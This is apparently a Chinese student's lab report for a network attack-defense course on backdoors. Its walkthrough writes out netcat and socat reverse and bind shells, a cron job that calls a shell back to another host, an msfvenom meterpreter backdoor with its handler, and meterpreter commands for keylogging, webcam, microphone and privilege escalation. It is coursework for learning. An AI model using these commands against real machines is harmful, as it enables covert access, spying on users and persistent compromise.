20155233 《网络对抗》Exp2 后门原理与实践
实验过程
1.Win获得Linux Shell
- windows:使用
ipconfig
指令查看本机ip:
- windows:使用
ncat
命令打开监听:
- Linux反弹连接win:
输入nc windows_IP 端口号 -e /bin/sh
连接win
- windows运行指令,如ls,查看,截图见上。
2.Linux获得Win Shell
- linux:使用
ifconfig
指令查看ip:
- linux使用命令
nc -l -p 端口号
监听
- windows反弹连接linux:
- linux下查看windows状态,见上图。
3.使用NC传输数据
- windows下监听端口:
输入ncat.exe -l 端口号
- linux连接端口:
输入nc windows_IP 端口号
- 会话过程(可加入参数传输文件):
4.使用netcat获取主机操作Shell,cron启动
- windows:使用命令
ncat.exe -l -p 端口号
打开端口监听
-linux:使用命令man crontab
指令查看相应的教程
- linux:用命令
crontab -e
编辑一条定时任务,可选vim编辑器(3)
在最后一行输入X * * * * /bin/netcat windows_IP 端口号 -e /bin/sh
意思是在每个小时的第X分钟反向连接Windows主机的端口
- windows:当到设置时间时,获得shell,输入指令验证
5.使用socat获取主机操作Shell, 任务计划启动
- 下载并解压socat
- windows:打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器
- 在操作->程序或脚本中选择你的
socat.exe
文件的路径,在添加参数一栏填写tcp-listen:端口号 exec:cmd.exe,pty,stderr
,这个命令的作用是把cmd.exe绑定到相应端口,同时把cmd.exe的stderr重定向到stdout上
- 创建完成之后,按
Windows+L
快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行,设置允许通过防火墙:
- linux:输入指令
socat - tcp:windows_IP:端口号
,这里的第一个参数-
代表标准的输入输出,第二个流连接到Windows主机的相应端口,你会发现已经成功获得一个shell
6.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
- linux:输入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=linuxIP LPORT=端口号 -f exe > 文件名_backdoor.exe
,生成后面程序
- 通过
NCAT
将后门程序传送到windows
- linux:在Kali上使用
msfconsole
指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口
- 输入以下命令:
use exploit/multi/handler
:进入handler模式
set payload windows/meterpreter/reverse_tcp
:设置payload
set LHOST linuxIP
:设置LHOST
set LPORT 端口号
:设置LPORT
show options
:查看当前信息状态
exploit:MSF开始监听
- windows:打开后门程序
- linux:此时,linux已经获得windows的shell
输入其他命令进行尝试
使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
在上题环境下,使用以下命令
record_mic
// 截获音频
webcam_snap
//摄像头拍照
webcam stream
//摄像头录像
screenshot
//截屏
keyscan_start
//记录击键过程
keyscan_dump
//读取击键记录
getuid
//查看当前用户
getsystem
//进行提权
提权出错,是不是因为win10安全等级高,还是其它?
基础问题回答
- (1)例举你能想到的一个后门进入到你系统中的可能方式?
我觉得可以将它通过程序自动移植到U盘,然后当U盘插入目标机时,自动复制到目标机。 - (2)例举你知道的后门如何启动起来(win及linux)的方式?
将后门跟正常程序捆绑在一起,等用户使用。 - (3)Meterpreter有哪些给你映像深刻的功能?
击键记录,它能知道你在这段时间干什么,输入了那些东西,感觉比较恐怖。 - (4)如何发现自己有系统有没有被安装后门?
防火墙、杀毒软件、查看开放端口等。
实验总结与体会
- 这次实验对后门工作原理有了了解,也跟着老师的实验指导做了属于自己的后门,抓拍了几张图,观察了击键记录,这让我简单的了解了后门的工作过程,对相应的后门工具、命令有了掌握,同时,这次实验让我对以后安全使用计算机有了相当重要的认识,要去正规网站下载程序,要规范化上网,这次入门级后门尝试只是一小步,我会在以后慢慢的学习中,去学习一些更高端的后门技术,制作更隐蔽的后门程序。
20155233 《网络对抗》Exp2 后门原理与实践的更多相关文章
- 20155323刘威良 网络对抗 Exp2 后门原理与实践
20155323 刘威良<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, ...
- 20155331 丹增旦达 网络攻防 Exp2后门原理与实践
20155331 丹增旦达<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...
- 20155302 Exp2 后门原理与实践
20155302<网络对抗>后门原理与实践 实验要求 1.使用netcat获取主机操作Shell,cron启动 (0.5分) 2.使用socat获取主机操作Shell, 任务计划启动 (0 ...
- 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
- 20155324《网络对抗》Exp2 后门原理与实践
20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...
- 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...
- 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...
- 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...
- 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...
随机推荐
- Difference between nn.softmax & softmax_cross_entropy_with_logits & softmax_cross_entropy_with_logits_v2
nn.softmax 和 softmax_cross_entropy_with_logits 和 softmax_cross_entropy_with_logits_v2 的区别 You have ...
- 用JavaScript写弹窗
每个弹窗的标识var x =0; var idzt = new Array(); var Window = function(config){ ID不重复 idzt[x] = "zhuti& ...
- Oracle 远程链接oracle数据库服务器的配置
远程链接oracle数据库服务器的配置 by:授客 QQ:1033553122 原理: 一.Oracle客户端与服务器端的通讯机制 1.OracleNet协议 如下图所示,Oracle通过Oracle ...
- linux查看某IP尝试连接成功和失败次数
查看连接失败次数 cat /var/log/secure | awk '/Failed/{print $(NF-3)}' | sort | uniq -c | awk '{print $2" ...
- Ubuntu 16.04 Server 设置静态IP
一.前言 最近需要在虚拟机当中装个Ubuntu Server 16.04的系统,但是在虚拟机安装的时候,并不像Ubuntu Server 18.04那样能一步步的进行配置,因此导致装好后的虚拟机是动态 ...
- 优化EF Code First第一次请求速度
由于EF Code First模式没有模型文件,所以很多一次请求的时候速度比较慢,EF需要将对应的数据库映射关系加载到内存里面,往后请求就比较快.可以通过在程序初始化的时候增加一段代码来优化EF第一次 ...
- C# WinForm中添加用户控件
转:https://blog.csdn.net/haelang/article/details/40681003 有的时候我们需要频繁使用一些系统默认工具的组合,那么就可以使用自定义用户控件. 起一个 ...
- Prometheus Node_exporter 之 Network Netstat TCP
Network Netstat TCP /proc/net/snmp 1. TCP Segments type: GraphUnit: shortLabel: Segments out (-) / i ...
- 简单了解Tomcat与OSGi的类加载器架构
前言: 本次博客主要是对Tomcat与OSGi的类加载器架构,所以就需要对tomcat.OSGi以及类加载机制有所了解 类加载可以在http://www.cnblogs.com/ghoster/p/7 ...
- Rarfile解压不了的问题
最近用python调用rarfile进行解压rar压缩包时,报了如下错误: rarfile.RarCannotExec: Unrar not installed? (rarfile.UNRAR_TOO ...